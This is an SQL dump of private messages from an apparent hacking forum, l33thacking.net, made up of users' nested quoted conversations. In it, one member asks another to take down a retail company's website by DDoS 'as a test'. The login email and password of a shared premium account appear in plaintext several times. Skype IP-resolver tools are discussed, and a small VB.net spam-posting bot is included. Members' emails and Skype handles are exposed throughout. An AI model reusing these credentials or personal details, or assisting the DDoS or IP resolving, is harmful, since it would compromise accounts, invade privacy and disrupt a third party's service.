to your password? \r\n[/quote]\r\n\r\nit kept saying it was wrong so I had to reset it.\r\n[/quote]\r\n\r\nCool, did you get the reset email under 1 hour? \r\n[/quote]\r\n\r\nyeah, it was instant.\r\n\r\n:)', '1347237111', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1503', '112', '1', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: The forwarder :)', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????Z\']\r\nhey man, would like to get one of the email forwarders. hopefully you find these posts suitable. thanks\r\n\r\nhttp://l33thacking.net/thread-373.html\r\nhttp://l33thacking.net/thread-356.html\r\nhttp://l33thacking.net/thread-340.html\r\n[/quote]\r\nWell you needed to post 3 [u]more[/u] threads. You posted 1 yesterday and you need 2 more, but just create 1 more HQ thread and I\'ll make you a forwader.\r\n\r\nAlso, PM me your desired forwarder address.\r\n[/quote]\r\n\r\nhttp://l33thacking.net/thread-383.html\r\n\r\ncould you forward the emails to vaider@42commando.com thanks', '1347258786', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1509', '112', '1', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: The forwarder :)', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????Z\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????Z\']\r\nhey man, would like to get one of the email forwarders. hopefully you find these posts suitable. thanks\r\n\r\nhttp://l33thacking.net/thread-373.html\r\nhttp://l33thacking.net/thread-356.html\r\nhttp://l33thacking.net/thread-340.html\r\n[/quote]\r\nWell you needed to post 3 [u]more[/u] threads. You posted 1 yesterday and you need 2 more, but just create 1 more HQ thread and I\'ll make you a forwader.\r\n\r\nAlso, PM me your desired forwarder address.\r\n[/quote]\r\n\r\nhttp://l33thacking.net/thread-383.html\r\n\r\ncould you forward the emails to vaider@42commando.com thanks\r\n[/quote]\r\n\r\nNice thread. Sure, but what do username would you like for the forwarder? \r\n[/quote]\r\n\r\n?ennerz please', '1347316517', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1511', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Coders', '0', 'I was requested to send you this link.\r\n\r\nhttp://l33thacking.net/thread-388-post-1781.html', '1347329924', '0', '3', '1347359141', '1', '0', '0', '1347358901'); INSERT INTO mybb_privatemessages VALUES('1517', '112', '82', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Read', '0', '[quote=\'iTzIpod\']\r\nHey,\r\nDo I have you on Skype?\r\nIf not, can you please add me? \r\nI wanna discuss about something. \r\n\r\n\r\nSkype: iTzIpod\r\n[/quote]\r\n\r\nokay, about to goto work, will be back online 7 hours from now.', '1347352327', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1519', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Coders', '0', '[quote=\'t3h jok3r\']\r\nI was requested to send you this link.\r\n\r\nhttp://l33thacking.net/thread-388-post-1781.html\r\n[/quote]\r\n\r\nIm gonna do it right now, in school.', '1347359141', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1524', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Coders', '0', '[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\nI was requested to send you this link.\r\n\r\nhttp://l33thacking.net/thread-388-post-1781.html\r\n[/quote]\r\n\r\nIm gonna do it right now, in school.\r\n[/quote]\r\n\r\nYou guys have VB.net in school? ', '1347413783', '0', '3', '1347430517', '1', '0', '0', '1347430472'); INSERT INTO mybb_privatemessages VALUES('1537', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'report', '0', 'Did you mean to report teh jokers thread? because I think we both know I can\'t really nuke that post, or move it.', '1347414623', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1545', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Staff/SMod', '0', '[quote=\'iTzIpod\']\r\nWhat\'s it like being apart of it? :D\r\n[/quote]\r\n\r\nIt\'s neat. I feel like I\'m actually helping out by moving threads to right sections things like that. it\'s nice.', '1347417570', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1548', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Coders', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\nI was requested to send you this link.\r\n\r\nhttp://l33thacking.net/thread-388-post-1781.html\r\n[/quote]\r\n\r\nIm gonna do it right now, in school.\r\n[/quote]\r\n\r\nYou guys have VB.net in school? \r\n[/quote]\r\n\r\nEach of us get a personal laptop. :)', '1347430517', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1550', '112', '82', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Read', '0', '[quote=\'iTzIpod\']\r\n[quote=\'??????Z\']\r\n[quote=\'iTzIpod\']\r\nHey,\r\nDo I have you on Skype?\r\nIf not, can you please add me? \r\nI wanna discuss about something. \r\n\r\n\r\nSkype: iTzIpod\r\n[/quote]\r\n\r\nokay, about to goto work, will be back online 7 hours from now.\r\n[/quote]\r\nKk\r\nAdd me when you have the time. \r\n[/quote]\r\n\r\ni have you added, my skype is SamJKendall', '1347434105', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1552', '112', '1', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: The forwarder :)', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????Z\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????Z\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????Z\']\r\nhey man, would like to get one of the email forwarders. hopefully you find these posts suitable. thanks\r\n\r\nhttp://l33thacking.net/thread-373.html\r\nhttp://l33thacking.net/thread-356.html\r\nhttp://l33thacking.net/thread-340.html\r\n[/quote]\r\nWell you needed to post 3 [u]more[/u] threads. You posted 1 yesterday and you need 2 more, but just create 1 more HQ thread and I\'ll make you a forwader.\r\n\r\nAlso, PM me your desired forwarder address.\r\n[/quote]\r\n\r\nhttp://l33thacking.net/thread-383.html\r\n\r\ncould you forward the emails to vaider@42commando.com thanks\r\n[/quote]\r\n\r\nNice thread. Sure, but what do username would you like for the forwarder? \r\n[/quote]\r\n\r\n?ennerz please\r\n[/quote]\r\n\r\nYour forwarder is kennerz@l33thacking.net\r\n\r\nWe are not responsible for how you may use this. Any illegal activities on this forwarder, we will deactivate/remove your forwarder.\r\n[/quote]\r\n\r\nthanks pal :)', '1347434144', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1560', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Coders', '0', '[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\nI was requested to send you this link.\r\n\r\nhttp://l33thacking.net/thread-388-post-1781.html\r\n[/quote]\r\n\r\nIm gonna do it right now, in school.\r\n[/quote]\r\n\r\nYou guys have VB.net in school? \r\n[/quote]\r\n\r\nEach of us get a personal laptop. :)\r\n[/quote]\r\n\r\nOh now I get it. ', '1347465694', '0', '1', '0', '1', '0', '0', '1347517116'); INSERT INTO mybb_privatemessages VALUES('1563', '112', '82', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Read', '0', '[quote=\'iTzIpod\']\r\n[quote=\'??????Z\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'??????Z\']\r\n[quote=\'iTzIpod\']\r\nHey,\r\nDo I have you on Skype?\r\nIf not, can you please add me? \r\nI wanna discuss about something. \r\n\r\n\r\nSkype: iTzIpod\r\n[/quote]\r\n\r\nokay, about to goto work, will be back online 7 hours from now.\r\n[/quote]\r\nKk\r\nAdd me when you have the time. \r\n[/quote]\r\n\r\ni have you added, my skype is SamJKendall\r\n[/quote]\r\n\r\nAight. \r\n[/quote]\r\n\r\ngot your message on skype, i was at work all day pal. just got home', '1347468740', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1565', '53', '82', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Eyyyy Thread design', '0', 'Hello\r\nIm in the need of a thread design again. Coz i wrote a new e-book.\r\nI will send you the text and the threadesign.psd later.\r\nI will pay 0.50 cents per sold e-book if you make me this thread design. I will send you the text and .psd tomorow.\r\nThanks :D', '1347476990', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1589', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Mod Mycode', '0', '[quote=\'t3h jok3r\']\r\nI fixed it in the exploit program thread.\r\n\r\nThe thing is that there should be no spaces between the text and the code.\r\n\r\nSo it should be [mod]etc etc example not [mod] hi this is an example\r\n\r\nSorry for not clarifying it in the mycode thread.\r\n[/quote]\r\n\r\nALright thanks, I did it on my school pc so I thought it was that aha.', '1347488928', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1593', '53', '82', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Eyyyy Thread design', '0', '[quote=\'iTzIpod\']\r\n[quote=\'sirchamp\']\r\nHello\r\nIm in the need of a thread design again. Coz i wrote a new e-book.\r\nI will send you the text and the threadesign.psd later.\r\nI will pay 0.50 cents per sold e-book if you make me this thread design. I will send you the text and .psd tomorow.\r\nThanks :D\r\n[/quote]\r\n\r\n.. Dude what the hell..\r\nYou said that you were going to need a thread design done by me for the other eBook you were selling. And then you said you canceled it because you already did it...\r\nAnd I already made it for you.. And then now you are telling me to make another one for you. \r\n-.-\r\nWhy not just make that one for yourself since you did that to the previous one..\r\n\r\n[/quote]\r\nWell I canceled it because you hadnt made it yet. Coz I made a shitty thread design. And i told you to write me when you start. But nvm. You are a lq member anyway. You havent made one tutorial yet. You just contribute to the forum with shit graphic designs and posts like \"thanks\" \"lol\" etc\r\n', '1347536167', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1601', '53', '82', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Eyyyy Thread design', '0', '[quote=\'iTzIpod\']\r\n[quote=\'sirchamp\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'sirchamp\']\r\nHello\r\nIm in the need of a thread design again. Coz i wrote a new e-book.\r\nI will send you the text and the threadesign.psd later.\r\nI will pay 0.50 cents per sold e-book if you make me this thread design. I will send you the text and .psd tomorow.\r\nThanks :D\r\n[/quote]\r\n\r\n.. Dude what the hell..\r\nYou said that you were going to need a thread design done by me for the other eBook you were selling. And then you said you canceled it because you already did it...\r\nAnd I already made it for you.. And then now you are telling me to make another one for you. \r\n-.-\r\nWhy not just make that one for yourself since you did that to the previous one..\r\n\r\n[/quote]\r\nWell I canceled it because you hadnt made it yet. Coz I made a shitty thread design. And i told you to write me when you start. But nvm. You are a lq member anyway. You havent made one tutorial yet. You just contribute to the forum with shit graphic designs and posts like \"thanks\" \"lol\" etc\r\n\r\n[/quote]\r\n\r\nHow am I a Mod then? \r\n[/quote]\r\nCoz you are the whole day on the forum reading...... and posting spam comments. Joker made you mod coz you are active nothing more.Stop bosting with admin rights. Kid', '1347542838', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1612', '67', '67', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Skype IP', '0', 'Hey.\r\nI found this website yesterday.\r\nAnd I decided to release it to the community. \r\nIt finds the Skype ID\'s IP. \r\n\r\nCheck out the thread here:\r\nhttp://l33thacking.net/thread-401.html\r\n\r\n=]\r\n', '1347631547', '0', '3', '1347649927', '1', '0', '2', '1347649881'); INSERT INTO mybb_privatemessages VALUES('1616', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'E-book', '0', 'do you want a vouch copy of my e-book? xD\r\nLink: http://www.mediafire.com/?occs2rh1zx2241d\r\nPassword: l33t\r\nthanks', '1347649333', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1622', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: sup', '0', '[quote=\'t3h jok3r\']\r\nSup long time no see, what you been up to?\r\n[/quote]\r\nIm online everyday. But I have had lots of tests the last week. And in the next 2 weeks I also have lots of tests-.-\r\nBut after that I have a free period. But Im still online 30-60min a day.\r\nAnd I hope you will read my e-book :)', '1347649474', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1624', '67', '82', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Skype IP', '0', '[quote=\'iTzIpod\']\r\nHey.\r\nI found this website yesterday.\r\nAnd I decided to release it to the community. \r\nIt finds the Skype ID\'s IP. \r\n\r\nCheck out the thread here:\r\nhttp://l33thacking.net/thread-401.html\r\n\r\n=]\r\n\r\n[/quote]\r\n\r\nAh, im admin on that page. ', '1347649927', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1626', '67', '100', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'Vouch Ddos', '0', 'Hey. Take down www.ica.no as a test. MSG Me 30 mins before you do it, and msg me 1 min before you do it please.', '1347650103', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1627', '67', '67', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Skype IP', '0', '[quote=\'HoverCatz\']\r\n[quote=\'iTzIpod\']\r\nHey.\r\nI found this website yesterday.\r\nAnd I decided to release it to the community. \r\nIt finds the Skype ID\'s IP. \r\n\r\nCheck out the thread here:\r\nhttp://l33thacking.net/thread-401.html\r\n\r\n=]\r\n\r\n[/quote]\r\n\r\nAh, im admin on that page. \r\n[/quote]\r\n\r\nWhat do you mean?', '1347650466', '0', '1', '0', '1', '0', '2', '1347651276'); INSERT INTO mybb_privatemessages VALUES('3362', '257', '257', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', ' Threaded Mode | Linear Mode MINECRAFT PREMIUM GIVEAWAY(no surveys) ', '0', 'Can i have one? \r\nThanks in advance bro.', '1350553528', '0', '1', '0', '1', '0', '2', '1350553552'); INSERT INTO mybb_privatemessages VALUES('3363', '62', '257', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', ' Threaded Mode | Linear Mode MINECRAFT PREMIUM GIVEAWAY(no surveys) ', '0', 'Can i have one? \r\nThanks in advance bro.', '1350553528', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1644', '67', '67', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Vouch Ddos', '0', '[quote=\'HoverCatz\']\r\nHey. Take down www.ica.no as a test. MSG Me 30 mins before you do it, and msg me 1 min before you do it please.\r\n[/quote]\r\n\r\nThat\'s a huge chain company??', '1347657748', '0', '3', '1347792179', '0', '0', '0', '1347792056'); INSERT INTO mybb_privatemessages VALUES('1645', '100', '67', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '2', 'Re: Vouch Ddos', '0', '[quote=\'HoverCatz\']\r\nHey. Take down www.ica.no as a test. MSG Me 30 mins before you do it, and msg me 1 min before you do it please.\r\n[/quote]\r\n\r\nThat\'s a huge chain company??', '1347657748', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1676', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Warning', '0', '[quote=\'t3h jok3r\']\r\nYou are not allowed to [b]DELETE[/b] threads. You should use the junk tool no matter what kind of thread it is. \r\n[/quote]\r\n\r\nOh sorry, I was at school and alot of the options don\'t come up for some reason, so I just used that. Since he took my astro pid and re uploaded it and tryed to make his own thread. in the same section.. I just deleted it.\r\n\r\nIll make sure I don\'t do it again.', '1347665267', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1692', '67', '67', '82', 'a:1:{s:2:\"to\";a:4:{i:0;s:2:\"67\";i:1;s:2:\"62\";i:2;s:3:\"112\";i:3;s:2:\"20\";}}', '5', 'Read', '0', 'Be sure to check out Unique Headquarters ;)\r\nThere are a lot of threads waiting to be read!', '1347667327', '0', '1', '0', '1', '0', '2', '1347792045'); INSERT INTO mybb_privatemessages VALUES('1732', '55', '1', '55', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\']\r\nSup man long time no see. \r\n[/quote]\r\n\r\nschool homework girls\r\n\r\nyea yea yea, how you been sorry for inactivity ', '1347683812', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1735', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: E-book', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'sirchamp\']\r\ndo you want a vouch copy of my e-book? xD\r\nLink: http://www.mediafire.com/?occs2rh1zx2241d\r\nPassword: l33t\r\nthanks\r\n[/quote]\r\n\r\nThanks, I will post my review soon. \r\n[/quote]\r\nThanks a lot for your review. It was my first e-book :S\r\n', '1347694102', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3364', '62', '62', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'that premium account ', '0', 'hey reloazor, whats up\r\nhere is that premium account please don\'t change the passwordddddd\r\nusername:the.big.d.man@hotmail.com\r\npassword:chicken737\r\nplease dont change it.\r\nplease say thanks on the thread\r\nrep me if i helped you \r\nand rate the thread if i helped you \r\ndont change the password pleaseeeeeeeee or you this preivelige will be taken off you and i will -rep you :)', '1350553717', '0', '3', '1350554355', '1', '0', '2', '1350554240'); INSERT INTO mybb_privatemessages VALUES('3365', '257', '62', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'that premium account ', '0', 'hey reloazor, whats up\r\nhere is that premium account please don\'t change the passwordddddd\r\nusername:the.big.d.man@hotmail.com\r\npassword:chicken737\r\nplease dont change it.\r\nplease say thanks on the thread\r\nrep me if i helped you \r\nand rate the thread if i helped you \r\ndont change the password pleaseeeeeeeee or you this preivelige will be taken off you and i will -rep you :)', '1350553717', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3366', '257', '257', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: that premium account ', '0', '[quote=\'?(???)?TREYZ?(???)?\']\r\nhey reloazor, whats up\r\nhere is that premium account please don\'t change the passwordddddd\r\nusername:the.big.d.man@hotmail.com\r\npassword:chicken737\r\nplease dont change it.\r\nplease say thanks on the thread\r\nrep me if i helped you \r\nand rate the thread if i helped you \r\ndont change the password pleaseeeeeeeee or you this preivelige will be taken off you and i will -rep you :)\r\n[/quote]\r\n\r\nRepped you, thanks alot.\r\nI wont change the PW, dont worry.', '1350554355', '0', '3', '1350554533', '1', '0', '2', '1350554507'); INSERT INTO mybb_privatemessages VALUES('3367', '62', '257', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: that premium account ', '0', '[quote=\'?(???)?TREYZ?(???)?\']\r\nhey reloazor, whats up\r\nhere is that premium account please don\'t change the passwordddddd\r\nusername:the.big.d.man@hotmail.com\r\npassword:chicken737\r\nplease dont change it.\r\nplease say thanks on the thread\r\nrep me if i helped you \r\nand rate the thread if i helped you \r\ndont change the password pleaseeeeeeeee or you this preivelige will be taken off you and i will -rep you :)\r\n[/quote]\r\n\r\nRepped you, thanks alot.\r\nI wont change the PW, dont worry.', '1350554355', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3368', '62', '62', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Re: that premium account ', '0', '[quote=\'R?????zo?\']\r\n[quote=\'?(???)?TREYZ?(???)?\']\r\nhey reloazor, whats up\r\nhere is that premium account please don\'t change the passwordddddd\r\nusername:the.big.d.man@hotmail.com\r\npassword:chicken737\r\nplease dont change it.\r\nplease say thanks on the thread\r\nrep me if i helped you \r\nand rate the thread if i helped you \r\ndont change the password pleaseeeeeeeee or you this preivelige will be taken off you and i will -rep you :)\r\n[/quote]\r\n\r\nRepped you, thanks alot.\r\nI wont change the PW, dont worry.\r\n[/quote]\r\n\r\nthanks for understanding:)', '1350554533', '0', '1', '0', '1', '0', '2', '1350560008'); INSERT INTO mybb_privatemessages VALUES('3369', '257', '62', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Re: that premium account ', '0', '[quote=\'R?????zo?\']\r\n[quote=\'?(???)?TREYZ?(???)?\']\r\nhey reloazor, whats up\r\nhere is that premium account please don\'t change the passwordddddd\r\nusername:the.big.d.man@hotmail.com\r\npassword:chicken737\r\nplease dont change it.\r\nplease say thanks on the thread\r\nrep me if i helped you \r\nand rate the thread if i helped you \r\ndont change the password pleaseeeeeeeee or you this preivelige will be taken off you and i will -rep you :)\r\n[/quote]\r\n\r\nRepped you, thanks alot.\r\nI wont change the PW, dont worry.\r\n[/quote]\r\n\r\nthanks for understanding:)', '1350554533', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3370', '228', '228', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Yo...', '0', 'wanna delete that stars thread? Second glance they are alright :P', '1350556854', '0', '1', '0', '1', '0', '0', '1350556884'); INSERT INTO mybb_privatemessages VALUES('3371', '222', '228', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Yo...', '0', 'wanna delete that stars thread? Second glance they are alright :P', '1350556854', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3372', '222', '222', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'Yo', '0', 'It is now gone', '1350556998', '0', '3', '1350557336', '1', '0', '2', '1350557320'); INSERT INTO mybb_privatemessages VALUES('3373', '228', '222', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '2', 'Yo', '0', 'It is now gone', '1350556998', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3374', '228', '228', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Re: Yo', '0', '[quote=\'VirtualLegend\']\r\nIt is now gone\r\n[/quote]\r\n\r\nok thanks broski :D', '1350557336', '0', '3', '1350696855', '1', '0', '2', '1350557342'); INSERT INTO mybb_privatemessages VALUES('3375', '222', '228', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Yo', '0', '[quote=\'VirtualLegend\']\r\nIt is now gone\r\n[/quote]\r\n\r\nok thanks broski :D', '1350557336', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3376', '222', '222', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'Re: Yo', '0', '[quote=\'ƒ???????????g\']\r\n[quote=\'VirtualLegend\']\r\nIt is now gone\r\n[/quote]\r\n\r\nok thanks broski :D\r\n[/quote]\r\n\r\nNo Problem', '1350557364', '0', '1', '0', '1', '0', '2', '1350558617'); INSERT INTO mybb_privatemessages VALUES('3377', '228', '222', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '2', 'Re: Yo', '0', '[quote=\'ƒ???????????g\']\r\n[quote=\'VirtualLegend\']\r\nIt is now gone\r\n[/quote]\r\n\r\nok thanks broski :D\r\n[/quote]\r\n\r\nNo Problem', '1350557364', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3378', '257', '257', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Minecraft Premium Account', '0', 'Hello, can I have this account?', '1350558300', '0', '1', '0', '1', '0', '2', '1350589496'); INSERT INTO mybb_privatemessages VALUES('3379', '100', '257', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Minecraft Premium Account', '0', 'Hello, can I have this account?', '1350558300', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3380', '61', '61', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Yo....', '0', 'http://l33thacking.net/thread-940.html....hehehe\r\n\r\nGet on skype and Ill give you what I got when I get back from the store...:D\r\n\r\n', '1350562293', '0', '1', '0', '1', '0', '2', '1350574327'); INSERT INTO mybb_privatemessages VALUES('3381', '222', '61', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Yo....', '0', 'http://l33thacking.net/thread-940.html....hehehe\r\n\r\nGet on skype and Ill give you what I got when I get back from the store...:D\r\n\r\n', '1350562293', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3382', '222', '222', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'Source', '0', 'Could you send me the source? Thanks man.', '1350564065', '0', '3', '1350565438', '0', '0', '2', '1350565287'); INSERT INTO mybb_privatemessages VALUES('3383', '2', '222', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '2', 'Source', '0', 'Could you send me the source? Thanks man.', '1350564065', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3384', '2', '2', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Re: Source', '0', '[quote=\'Apathy\']\r\nCould you send me the source? Thanks man.\r\n[/quote]\r\n\r\nHere you go bro. Code is nice and simple. Decided to not to include a webclient. You can change this any way you like to make ur own bot :P\r\n\r\n[code]Public Class Form1\r\n\r\n Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click\r\n ToolStripStatusLabel2.Text = \"Browsing to Pasteheaven\"\r\n \'browse to pasteheaven\r\n WebBrowser1.Navigate(\"http://pasteheaven.com\")\r\n Do Until WebBrowser1.ReadyState = WebBrowserReadyState.Complete\r\n Application.DoEvents()\r\n Loop\r\n ToolStripStatusLabel2.Text = \"Done Browsing\"\r\n \'declare tags\r\n Dim l33thacking As HtmlElementCollection = WebBrowser1.Document.GetElementsByTagName(\"textarea\")\r\n\r\n For Each hacker As HtmlElement In l33thacking\r\n If hacker.GetAttribute(\"id\") = \"paste\" Then\r\n hacker.InnerText = \"Be sure to join http://l33thacking.net today for all the best hacking tutorials and content\"\r\n \'hacker.InnerText = \"Hey What\'s up\" \'Test Post\r\n End If\r\n Next\r\n Dim forsakenbeing As HtmlElementCollection = WebBrowser1.Document.GetElementsByTagName(\"input\")\r\n\r\n For Each awesomeness As HtmlElement In forsakenbeing \'For each element with id of title post the title below\r\n If awesomeness.GetAttribute(\"id\") = \"title\" Then\r\n awesomeness.InnerText = \"Join L33thacking.net\"\r\n End If\r\n \' click submit\r\n If awesomeness.GetAttribute(\"id\") = \"submit\" Then\r\n awesomeness.InvokeMember(\"click\")\r\n End If\r\n ToolStripStatusLabel2.Text = \"Creating paste\"\r\n Next\r\n ToolStripStatusLabel2.Text = \"Done. Check http://pasteheaven.com for your paste\"\r\n End Sub\r\nEnd Class[/code]', '1350565438', '0', '1', '0', '1', '0', '2', '1350595724'); INSERT INTO mybb_privatemessages VALUES('1753', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Font', '0', '[quote=\'iTzIpod\']\r\nWhat font did you use for your Gamer Userbar?\r\n[/quote]\r\nhttp://www.dafont.com/8bit-wonder.font', '1347724611', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1757', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'skype api', '0', 'Does your skype resolver api still work?\r\nmines down and I\'m trying to code a exe based resolver.', '1347734615', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1761', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: skype api', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\nDoes your skype resolver api still work?\r\nmines down and I\'m trying to code a exe based resolver.\r\n[/quote]\r\n\r\nIt\'s down. \r\n[/quote]\r\n\r\nlame, I coded this whole thing and than tryed to use my old api and realised it\'s down :/\r\n\r\nill try to find a new one I guess.', '1347736753', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1764', '61', '1', '61', 